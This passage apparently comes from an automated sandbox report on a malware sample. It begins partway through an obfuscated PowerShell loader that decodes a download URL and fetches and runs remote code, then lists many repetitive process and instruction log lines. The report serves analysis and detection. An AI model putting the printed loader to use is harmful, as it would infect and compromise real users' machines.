PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD33FE00BD pushad ; iretd 2_2_00007FFD33FE00C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD33FE00BD pushad ; iretd 10_2_00007FFD33FE00C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD340B4526 push es; retf 10_2_00007FFD340B4527
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD340B7546 push eax; iretd 10_2_00007FFD340B7561
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD340B437F push ds; iretd 10_2_00007FFD340B438F
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07B8CF5C push eax; iretd 16_2_07B8CF5D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC28ED push ebx; ret 24_3_02FC28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC18C0 push ebp; retf 24_3_02FC18C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC58BC pushad ; ret 24_3_02FC58C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC588E push eax; iretd 24_3_02FC589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC225D push eax; ret 24_3_02FC225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC6012 push 00000038h; iretd 24_3_02FC601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC5606 pushad ; retf 24_3_02FC5619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC5FEE push FFFFFFD2h; retf 24_3_02FC6011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC0FEA push eax; ret 24_3_02FC0FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC278B push ebx; ret 24_3_02FC28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC1179 push FFFFFF82h; iretd 24_3_02FC117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC4920 push 0000002Eh; iretd 24_3_02FC4922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 24_3_02FC5F0C push es; iretd 24_3_02FC5F0D
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
